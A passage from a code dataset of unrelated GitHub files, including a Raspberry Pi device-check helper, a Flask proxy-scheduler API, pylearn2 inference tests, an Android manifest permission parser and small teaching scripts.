presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttyArduinoProgram')\n print(\"[Arduino] Arduino Present\")\n print(\"[Arduino] Device Name = \" + dev.sys_name)\n return True\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] Arduino Not Present - \" + str(e))\n print(e)\n return False\n return False\n\n def checkSensorNode ():\n print(\"[Arduino] Checking Arduino Sensor Node presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttySensorNode')\n print(\"[Arduino] Arduino Sensor Node Present\")\n print(\"[Arduino] Device Name = \" + dev.sys_name)\n return True\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] Arduino Sensor Node Not Present - \" + str(e))\n print(e)\n return False\n return False\n\n def checkBluetooth():\n # C8:3F:26:F8:65:E8\n print(\"[Xbox-Controller] Checking Xbox-Controller presence\")\n process = sp.Popen(['hcitool', 'con'], stdout=sp.PIPE, stderr=sp.PIPE)\n out, err = process.communicate()\n if \"C8:3F:26:F8:65:E8\" in out.split():\n print(\"[Xbox-Controller] Xbox-one controller is connected\")\n return True\n else:\n print(\"[Xbox-Controller] Xbox-one controller that is stored is not Found , Other Connected Devices are as below\")\n print(out)\n return False\n return 
False\n","repo_name":"furhadjidda/astro","sub_path":"raspberry_pi/src/astro_base/script/diagUtil.py","file_name":"diagUtil.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16822586129","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport json\nimport time\nfrom glob import glob\n\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\n\nimport config\nimport scheduler\n\nlogger = config.get_logger()\n\n\ndef main():\n config.check_dir()\n\n # load scheduler\n ps = scheduler.ProxyScheduler()\n\n if len(ps.config_dict) == 0:\n ps.update_subscription()\n\n app = Flask(__name__)\n\n # CORS for debug usage\n # DO NOT use it on a production environment\n # CORS(app)\n\n @app.route(\"/get/proxy_info\")\n def get_ps_info():\n status = \"running\" if ps._server_process is not None else \"stopped\"\n if status == \"running\":\n server_started_time = ps._server_started_time.strftime(\"%Y%m%d-%H:%M:%S\")\n else:\n server_started_time = \"------\"\n remaining_traffic = \"UNKNOWN\" if ps.remaining_traffic_bytes is None else ps.remaining_traffic_bytes\n expiration_date = \"UNKNOWN\" if ps.expiration_date is None else ps.expiration_date\n return jsonify({\n \"status\": status,\n \"listen_on\": \"{}:{}\".format(config.LOCAL_ADDR, config.LOCAL_PORT),\n \"server_started_time\": server_started_time,\n \"running_config\": \"__none__\" if ps.running_name is None else ps.running_name,\n \"remaining_traffic\": remaining_traffic,\n \"expiration_date\": expiration_date,\n })\n\n @app.route(\"/get/proxy_list\")\n def get_name_list():\n name_list = sorted(list(ps.config_dict.keys()))\n return jsonify(name_list)\n\n @app.route(\"/get/proxy_log\")\n def get_proxy_log():\n return jsonify({\"log\": ps.get_log()})\n\n @app.route(\"/start_proxy\", methods=[\"GET\"])\n def start_proxy():\n name = request.args.to_dict()['name']\n ps.serve(name)\n \n if ps._server_process is None:\n ret = False\n else:\n ret = True\n return jsonify({\n \"success\": ret,\n })\n\n @app.route(\"/stop_proxy\", methods=[\"GET\"])\n def stop_proxy():\n ps.stop()\n if ps._server_process is None:\n ret = True\n else:\n ret = False\n return jsonify({\n \"success\": ret,\n })\n\n app.run(config.API_SERVER_HOST, config.API_SERVER_PORT)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"atarss/proxy_scheduler","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37262126113","text":"class node:\n # link is also called pointer\n def __init__(self, data=None, link=None):\n self.data = data\n self.link = link\n\nclass linked_list:\n def __init__(self):\n self.head = None\n\n # function that adds a node at front\n def add_at_front(self, data):\n self.head = node(data=data, link=self.head)\n\n # function to check whether the list is empty\n def is_empty(self):\n return self.head == None\n\n # function to add node at end\n def add_at_end(self, data):\n if not self.head:\n self.head = node(data=data)\n return\n curr = self.head\n while curr.link:\n curr = curr.link\n curr.link = node(data=data)\n\n # function to delete any node\n def delete_node(self, key):\n curr = self.head\n prev = None\n while curr and curr.data != key:\n prev = curr\n curr = curr.link\n if prev is None:\n self.head = curr.link\n elif curr:\n prev.link = curr.link\n curr.link = None\n\n # function to get 
the last node\n def get_last_node(self):\n temp = self.head\n while temp.link:\n temp = temp.link\n return temp.data\n\n # function to print the list nodes\n def print_list(self):\n node = self.head\n while node != None:\n print(node.data, end=\">>\")\n node = node.link\n\n\n","repo_name":"ebel-frank/python-projects","sub_path":"LinkedList DataStructure.py","file_name":"LinkedList DataStructure.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15028786486","text":"import dbtools\n\ngames = dbtools.load('games')\ncontribs = {}\n\nfor game, data in games.items():\n if 'contributors' in data:\n contributors = data['contributors']\n\n for c in contributors:\n if not c in contribs:\n contribs[c] = 1\n else: contribs[c] += 1\n\nfor c in reversed(sorted(contribs, key=lambda p: contribs[p])):\n print(c)\n \n","repo_name":"strata8/savman-db","sub_path":"list_contribs.py","file_name":"list_contribs.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18111203793","text":"from django.conf import settings\nfrom django.conf.urls.defaults import *\n\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nadmin.autodiscover()\nurlpatterns = patterns('django.views.static',\n (r'^%s(?P.*)' % settings.MEDIA_URL[1:], 'serve',\n {'document_root': settings.MEDIA_ROOT}),\n)\n\nif \"tinymce\" in settings.INSTALLED_APPS:\n urlpatterns += patterns('django.views.static',\n (r'^tinymce/', include('tinymce.urls')),)\n\nurlpatterns += staticfiles_urlpatterns()\n\nurlpatterns += patterns('',\n (r'^trad/', include('rosetta.urls')),\n (r'^admin/', include(admin.site.urls)),\n url(r'^', include('chimere.urls', namespace=\"chimere\")),\n)\n","repo_name":"InnovAfrica/nanu-yeggle","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5651511052","text":"from __future__ import print_function\n\nfrom pylearn2.models.s3c import S3C\nfrom pylearn2.models.s3c import E_Step_Scan\nfrom pylearn2.models.s3c import Grad_M_Step\nfrom pylearn2.models.s3c import E_Step\nfrom pylearn2.utils import contains_nan\nfrom theano import function\nimport numpy as np\nfrom theano.compat.six.moves import xrange\nimport theano.tensor as T\nfrom theano import config\n#from pylearn2.utils import serial\n\n\ndef broadcast(mat, shape_0):\n rval = mat\n if mat.shape[0] != shape_0:\n assert mat.shape[0] == 1\n\n rval = np.zeros((shape_0, mat.shape[1]),dtype=mat.dtype)\n\n for i in xrange(shape_0):\n rval[i,:] = mat[0,:]\n\n return rval\n\n\nclass Test_S3C_Inference:\n def setUp(self):\n # Temporarily change config.floatX to float64, as s3c inference\n # tests currently fail due to numerical issues for float32.\n self.prev_floatX = config.floatX\n config.floatX = 'float64'\n\n def tearDown(self):\n # Restore previous value of floatX\n config.floatX = self.prev_floatX\n\n def __init__(self):\n \"\"\" gets a small batch of data\n sets up an S3C model\n \"\"\"\n # We also have to change the value of config.floatX in __init__.\n self.prev_floatX = config.floatX\n config.floatX = 'float64'\n\n try:\n self.tol = 1e-5\n\n #dataset = serial.load('${PYLEARN2_DATA_PATH}/stl10/stl10_patches/data.pkl')\n\n #X = dataset.get_batch_design(1000)\n #X = X[:,0:5]\n\n X = 
np.random.RandomState([1,2,3]).randn(1000,5)\n\n X -= X.mean()\n X /= X.std()\n m, D = X.shape\n N = 5\n\n #don't give the model an e_step or learning rate so it won't spend years compiling a learn_func\n self.model = S3C(nvis = D,\n nhid = N,\n irange = .1,\n init_bias_hid = 0.,\n init_B = 3.,\n min_B = 1e-8,\n max_B = 1000.,\n init_alpha = 1., min_alpha = 1e-8, max_alpha = 1000.,\n init_mu = 1., e_step = None,\n m_step = Grad_M_Step(),\n min_bias_hid = -1e30, max_bias_hid = 1e30,\n )\n\n self.model.make_pseudoparams()\n\n self.h_new_coeff_schedule = [.1, .2, .3, .4, .5, .6, .7, .8, .9, 1. ]\n\n self.e_step = E_Step_Scan(h_new_coeff_schedule = self.h_new_coeff_schedule)\n self.e_step.register_model(self.model)\n\n self.X = X\n self.N = N\n self.m = m\n\n finally:\n config.floatX = self.prev_floatX\n\n def test_match_unrolled(self):\n \"\"\" tests that inference with scan matches result using unrolled loops \"\"\"\n\n unrolled_e_step = E_Step(h_new_coeff_schedule = self.h_new_coeff_schedule)\n unrolled_e_step.register_model(self.model)\n\n V = T.matrix()\n\n scan_result = self.e_step.infer(V)\n unrolled_result = unrolled_e_step.infer(V)\n\n outputs = []\n\n for key in scan_result:\n outputs.append(scan_result[key])\n outputs.append(unrolled_result[key])\n\n f = function([V], outputs)\n\n outputs = f(self.X)\n\n assert len(outputs) % 2 == 0\n\n for i in xrange(0,len(outputs),2):\n assert np.allclose(outputs[i],outputs[i+1])\n\n\n def test_grad_s(self):\n\n \"tests that the gradients with respect to s_i are 0 after doing a mean field update of s_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n model.test_batch_size = X.shape[0]\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n\n S = e_step.infer_S_hat(V = X, H_hat = H_var, S_hat = Mu1_var)\n\n s_idx = S[:,idx]\n\n s_i_func = function([H_var,Mu1_var,idx],s_idx)\n\n sigma0 = 1. 
/ model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0, var_s1_hat = Sigma1)\n\n grad_Mu1 = T.grad(trunc_kl.sum(), Mu1_var)\n\n grad_Mu1_idx = grad_Mu1[:,idx]\n\n grad_func = function([H_var, Mu1_var, idx], grad_Mu1_idx)\n\n for i in xrange(self.N):\n Mu1[:,i] = s_i_func(H, Mu1, i)\n\n g = grad_func(H,Mu1,i)\n\n assert not contains_nan(g)\n\n g_abs_max = np.abs(g).max()\n\n\n if g_abs_max > self.tol:\n raise Exception('after mean field step, gradient of kl divergence wrt mean field parameter should be 0, but here the max magnitude of a gradient element is '+str(g_abs_max)+' after updating s_'+str(i))\n\n def test_value_s(self):\n\n \"tests that the value of the kl divergence decreases with each update to s_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n S = e_step.infer_S_hat( V = X, H_hat = H_var, S_hat = Mu1_var)\n\n s_idx = S[:,idx]\n\n s_i_func = function([H_var,Mu1_var,idx],s_idx)\n\n sigma0 = 1. 
/ model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0, var_s1_hat = Sigma1)\n\n trunc_kl_func = function([H_var, Mu1_var], trunc_kl)\n\n for i in xrange(self.N):\n prev_kl = trunc_kl_func(H,Mu1)\n\n Mu1[:,i] = s_i_func(H, Mu1, i)\n\n new_kl = trunc_kl_func(H,Mu1)\n\n\n increase = new_kl - prev_kl\n\n\n mx = increase.max()\n\n if mx > 1e-3:\n raise Exception('after mean field step in s, kl divergence should decrease, but some elements increased by as much as '+str(mx)+' after updating s_'+str(i))\n\n def test_grad_h(self):\n\n \"tests that the gradients with respect to h_i are 0 after doing a mean field update of h_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n\n new_H = e_step.infer_H_hat(V = X, H_hat = H_var, S_hat = Mu1_var)\n h_idx = new_H[:,idx]\n\n updates_func = function([H_var,Mu1_var,idx], h_idx)\n\n sigma0 = 1. 
/ model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0,\n var_s1_hat = Sigma1)\n\n grad_H = T.grad(trunc_kl.sum(), H_var)\n\n assert len(grad_H.type.broadcastable) == 2\n\n #from theano.printing import min_informative_str\n #print min_informative_str(grad_H)\n\n #grad_H = Print('grad_H')(grad_H)\n\n #grad_H_idx = grad_H[:,idx]\n\n grad_func = function([H_var, Mu1_var], grad_H)\n\n failed = False\n\n for i in xrange(self.N):\n rval = updates_func(H, Mu1, i)\n H[:,i] = rval\n\n g = grad_func(H,Mu1)[:,i]\n\n assert not contains_nan(g)\n\n g_abs_max = np.abs(g).max()\n\n if g_abs_max > self.tol:\n #print \"new values of H\"\n #print H[:,i]\n #print \"gradient on new values of H\"\n #print g\n\n failed = True\n\n print('iteration ',i)\n #print 'max value of new H: ',H[:,i].max()\n #print 'H for failing g: '\n failing_h = H[np.abs(g) > self.tol, i]\n #print failing_h\n\n #from matplotlib import pyplot as plt\n #plt.scatter(H[:,i],g)\n #plt.show()\n\n #ignore failures extremely close to h=1\n\n high_mask = failing_h > .001\n low_mask = failing_h < .999\n\n mask = high_mask * low_mask\n\n print('masked failures: ',mask.shape[0],' err ',g_abs_max)\n\n if mask.sum() > 0:\n print('failing h passing the range mask')\n print(failing_h[ mask.astype(bool) ])\n raise Exception('after mean field step, gradient of kl divergence'\n ' wrt freshly updated variational parameter should be 0, '\n 'but here the max magnitude of a gradient element is '\n +str(g_abs_max)+' after updating h_'+str(i))\n\n\n #assert not failed\n\n\n def test_value_h(self):\n\n \"tests that the value of the kl divergence decreases with each update to h_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n newH = e_step.infer_H_hat(V = X, H_hat = H_var, S_hat = Mu1_var)\n\n\n h_idx = newH[:,idx]\n\n\n h_i_func = function([H_var,Mu1_var,idx],h_idx)\n\n sigma0 = 1. 
/ model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0, var_s1_hat = Sigma1)\n\n trunc_kl_func = function([H_var, Mu1_var], trunc_kl)\n\n for i in xrange(self.N):\n prev_kl = trunc_kl_func(H,Mu1)\n\n H[:,i] = h_i_func(H, Mu1, i)\n #we don't update mu, the whole point of the split e step is we don't have to\n\n new_kl = trunc_kl_func(H,Mu1)\n\n\n increase = new_kl - prev_kl\n\n\n print('failures after iteration ',i,': ',(increase > self.tol).sum())\n\n mx = increase.max()\n\n if mx > 1e-4:\n print('increase amounts of failing examples:')\n print(increase[increase > self.tol])\n print('failing H:')\n print(H[increase > self.tol,:])\n print('failing Mu1:')\n print(Mu1[increase > self.tol,:])\n print('failing V:')\n print(X[increase > self.tol,:])\n\n\n raise Exception('after mean field step in h, kl divergence should decrease, but some elements increased by as much as '+str(mx)+' after updating h_'+str(i))\n\nif __name__ == '__main__':\n obj = Test_S3C_Inference()\n\n #obj.test_grad_h()\n #obj.test_grad_s()\n #obj.test_value_s()\n obj.test_value_h()\n","repo_name":"lisa-lab/pylearn2","sub_path":"pylearn2/models/tests/test_s3c_inference.py","file_name":"test_s3c_inference.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","stars":2743,"dataset":"github-code","pt":"53"} +{"seq_id":"18781909500","text":"import numpy as np\nfrom activation import relu, softmax\n\n\nclass FullyConnected:\n def __init__(self, dim_in, dim_out, batch_size, activation):\n # initialization according to He et al.(2015)\n self.W = np.random.randn(dim_in, dim_out).astype(np.float32) \\\n * np.sqrt(2.0/(dim_in))\n self.b = np.zeros([dim_out]).astype(np.float32)\n self.batch_size = batch_size\n self.activation = activation\n self.v_b = np.zeros([dim_out])\n self.v_W = np.zeros([dim_in, dim_out])\n\n def forward(self, inputs):\n self.inputs = inputs\n outputs = np.dot(inputs, self.W) + self.b\n self.outputs = outputs\n outputs = self.activation.forward(outputs)\n self.outputs_act = outputs\n return outputs\n\n def backward(self, grad):\n activ_grad = self.activation.backward(self.outputs,\n self.outputs_act, grad)\n self.grad_b = np.mean(activ_grad, axis=0)\n self.grad_W = np.dot(self.inputs.transpose(),\n activ_grad) / len(self.inputs)\n grad_inputs = np.dot(activ_grad, self.W.transpose())\n return grad_inputs\n\n def update(self, lr, momentum):\n self.v_b = momentum * self.v_b + lr * self.grad_b\n self.v_W = momentum * self.v_W + lr * self.grad_W\n self.W = self.W - self.v_W\n self.b = self.b - self.v_b\n","repo_name":"wenhycs/mlp-fashion-mnist","sub_path":"layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5951029207","text":"import os\nimport re\nimport sys\n\nargv = sys.argv\nargc = len(argv)\nstdout = sys.stdout\n\nif(argc != 2):\n stdout.write('Usage: python TP2p1.py manifests\\n')\n exit(1)\n\nmanifestsDirectory = argv[1]\n\n\n# ==============================================================================\n# === FILE READING 
=============================================================\n\ndef isXmlFile(fileName):\n    return fileName.endswith('.xml')\n\ndef getXmlFilesPathsFromDirectory(directoryPath):\n    try:\n        filesNames = os.listdir(directoryPath)\n        xmlFilesNames = filter(isXmlFile, filesNames)\n        return [os.path.join(directoryPath, xmlFileName) for xmlFileName in xmlFilesNames]\n    except:\n        stdout.write('Could not find directory \"{}\"\\n'.format(directoryPath))\n        exit(1)\n\ndef getAppNameFromFilePath(filePath):\n    appNameRegex = 'AndroidManifest_(.*)\\.xml$'\n    return re.search(appNameRegex, filePath).group(1)\n\ndef isPermissionTag(string):\n    usesPermissionTagRegex = '^<uses-permission.*/>$'\n    return re.search(usesPermissionTagRegex, string.strip()) is not None\n\ndef getPermissionsFromManifestFile(manifestFile):\n    permissions = []\n    permissionRegex = 'android.permission\\.(\\w*)\"'\n    for line in manifestFile:\n        if not isPermissionTag(line):\n            continue\n\n        permissionSearch = re.search(permissionRegex, line)\n        if permissionSearch is not None:\n            permissions.append(permissionSearch.group(1))\n\n    return permissions\n\n\n# ==============================================================================\n# === PRINTING HELPERS =========================================================\n\ndef printHeader(title):\n    stdout.write('===================\\n\\n')\n    stdout.write('{}\\n\\n'.format(title))\n    stdout.write('===================\\n\\n')\n\ndef printPermissions(permissions):\n    stdout.write('{}\\n\\n'.format(permissions))\n\ndef printAppPermissions(appName, permissions):\n    stdout.write('{}: {}\\n\\n'.format(appName, permissions))\n\n\n# ==============================================================================\n# === PROGRAM EXECUTION ========================================================\n\nappsPermissions = {}\n\n# Reads every manifest file\nfor manifestFilePath in getXmlFilesPathsFromDirectory(manifestsDirectory):\n    appName = getAppNameFromFilePath(manifestFilePath)\n    manifestFile = open(manifestFilePath, 'r')\n\n    appPermissions = getPermissionsFromManifestFile(manifestFile)\n    appsPermissions[appName] = appPermissions\n\n    manifestFile.close()\n\n\n# Printing permissions\n\nprintHeader('Permissoes por APK')\nfor appName in sorted(appsPermissions):\n    appPermissions = appsPermissions[appName]\n    printAppPermissions(appName, appPermissions)\n\nprintHeader('Permissoes unicas por APK')\nfor appName in sorted(appsPermissions):\n    appPermissions = appsPermissions[appName]\n\n    allOtherPermissions = []\n    for [appToCheckName, permissionsToCheck] in appsPermissions.items():\n        if appToCheckName == appName:\n            continue\n\n        allOtherPermissions += permissionsToCheck\n\n    uniquePermissions = [permission for permission in appPermissions if permission not in allOtherPermissions]\n    printAppPermissions(appName, uniquePermissions)\n\n\nprintHeader('Permissoes comuns das APKs')\nallPermissionsLists = [set(permissionsList) for permissionsList in appsPermissions.values()]\ncommonPermissions = set.intersection(*allPermissionsLists)\nprintPermissions(list(commonPermissions))\n","repo_name":"jvmoreira/CDadosSeg","sub_path":"T2/Parte1/TP2p1.py","file_name":"TP2p1.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"73618228647","text":"from draw import *\nclass Node:\n\tdef __init__(self,x=0,y=0,name=\"\"):\n\t\tself.x=x\n\t\tself.y=y\n\t\tself.name=name\n\t\t\nclass member:\n\tdef 
__init__(self,startnode,endnode,name=\"\",area=0):\n\t\tself.startnode=startnode\n\t\tself.endnode=endnode\n\t\tself.name=name\n\t\tself.area=area\n\t\t\n\tdef memberlength(self):\n\t\timport math\n\t\treturn(math.sqrt((self.startnode.x-self.endnode.x)**2+(self.startnode.y-self.endnode.y)**2))\n\tdef membereal(self,e):\n\t\treturn(float(e*self.area)/self.memberlength())\nclass Truss:\n\tnodes=[]\n\tmembers=[]\n\tdef __init__(self, inifile):\n\t\tself.inifile=inifile\n\t\t\n\tdef readini(self):\n\t\timport configparser\n\t\ttry:\n\t\t\tconfig = configparser.ConfigParser()\n\t\t\tconfig.read(self.inifile)\n\t\t\tself.points=int(config['base']['points'])\n\t\t\tself.bars=int(config['base']['bars'])\n\t\t\tself.e=int(config['base']['e'])\n\t\t\tfor inputnode in config.options('node'):\n\t\t\t\tif inputnode.find('p')!=-1:\n\t\t\t\t\tnodepoints=config['node'][inputnode].split(',')\n\t\t\t\t\tself.nodes.append(Node(int(nodepoints[0]),int(nodepoints[1]),inputnode))\n\t\t\t\t\t\n\t\t\tfor inputmember in config.options('member'):\n\t\t\t\tif inputmember.find('bar')!=-1:\n\t\t\t\t\tbarnodes=config['member'][inputmember].split(',')\n\t\t\t\t\t#print(barnodes)\n\t\t\t\t\tfor i in self.nodes:\n\t\t\t\t\t\tfor j in self.nodes:\n\t\t\t\t\t\t\tif i.name.strip('p')==barnodes[0] and j.name.strip('p')==barnodes[1]:\n\t\t\t\t\t\t\t\tself.members.append(member(i,j,inputmember))\n\t\t\t\t\tcontinue\n\t\t\t\telif inputmember.find('area')!=-1:\n\t\t\t\t\tareanum=inputmember.strip('area')\n\t\t\t\t\tfor n in self.members:\n\t\t\t\t\t\tif n.name.strip('bar')==areanum:\n\t\t\t\t\t\t\tn.area=float(config['member'][inputmember])\n\t\t\t#for n in self.nodes:\n\t\t\t#\tprint(n.name,n.x,n.y)\n\t\t\t#for n in self.members:\n\t\t\t\t#print(n.memberlength())\n\t\t\t\t#print(n.startnode, n.endnode, n.name,n.area)\n\t\texcept:\n\t\t\tprint(\"ini fail\")\n\tdef outputini(self):\n\t\timport configparser\n\t\tconfig = configparser.ConfigParser()\n\t\tf = open('0551287OUT.ini', 'w')\n\t\tconfig.add_section('MemberLengthResult')\n\t\tfor i in self.members:\n\t\t\tconfig.set('MemberLengthResult',i.name,\" length %.1f, E*A/L %.1f\"%(i.memberlength(),i.membereal(self.e)))\n\t\tconfig.write(f)\n\t\tf.close()\n\ndef main():\n\tt=Truss(\"0551287.ini\")\n\tt.readini()\n\tt.outputini()\n\tdrawout=drawtruss(t,10)\n\tdrawout.creatCanvas()\n\tdrawout.drawbar()\n\tdrawout.drawcircle()\n\tdrawout.root.mainloop()\n\t\nif __name__ == '__main__':\n\tmain()","repo_name":"joechung99/Computer-Programming-and-Engineering-Application","sub_path":"project2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31551191506","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 25 20:40:26 2018\r\n\r\n@author: Kevin\r\n\"\"\"\r\n\r\nimport math\r\n# Prompt the user to input a number\r\ninput_num = float(input(\"Input a number: \"))\r\n\r\n# Output the log of that number (base 10)\r\nprint(\"Log base 10 of that number is: \" + str(math.log10(input_num)))\r\n\r\nlog10_num = math.log10(input_num)\r\nresult = math.floor(log10_num)\r\n\r\n# Output the nearest integer less than that number \r\nprint(\"Nearest int to result is: \" + str(result))\r\n\r\n# prompt the user to input two numbers\r\nnum1 = float(input(\"Input the first number: \"))\r\nnum2 = float(input(\"Input the second number: \"))\r\nsum1 = num1 + num2\r\nprint(\"The sum of those two numbers is \", sum1)\r\n","repo_name":"kmak2008/Test","sub_path":"Labs/Lab 3 
Solution.py","file_name":"Lab 3 Solution.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13306226156","text":"import numpy as np\nimport pandas as pd\nimport json\nfrom PIL import Image\nimport cv2\nimport os\nfrom tqdm import tqdm\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\nfrom scipy import ndimage\nimport random\nimport albumentations as A\n\ndef make_nochange_onlyTrain(data_path, label_path): \n\tos.makedirs('./src/images/train', exist_ok=True)\n\t# train data\n\ttrain_imgs_path = data_path\n\twith open(label_path) as f:\n\t\tjson_data = json.load(f)\n\n\timg_names = list(json_data.keys())\n\tfor img_name in tqdm(img_names,desc='{}'.format('train_preprocess')):\n\t\t# img\n\t\timg_path = train_imgs_path+'/'+img_name\n\t\timg_gray = np.array(Image.open(img_path).convert('L')) \n\t\timg_h, img_w = img_gray.shape[0], img_gray.shape[1]\n\t\t# eda.py를 바탕으로 크롭할 부분 지정하기 (나중에)\n\t\tclahe1 = cv2.createCLAHE(clipLimit=2, tileGridSize=(8,8))\n\t\tclahe2 = cv2.createCLAHE(clipLimit=2, tileGridSize=(30,30))\n\t\timg_cl1 = clahe1.apply(img_gray)\n\t\timg_cl2 = clahe2.apply(img_gray)\n\t\timg_cl_twice = clahe1.apply(img_cl2)\n\t\tfinal = np.dstack((img_cl_twice, img_cl2, img_cl1))\n\t\tsave_img = Image.fromarray(final.astype(np.uint8))\n\t\tsave_img.save('./src/images/train/{}'.format(img_name)) # ./dataset_nochange/images/train/{}\n\ndef make_Aug_Test(data_path):\n\tos.makedirs('./src/images/test', exist_ok=True)\n\t# test 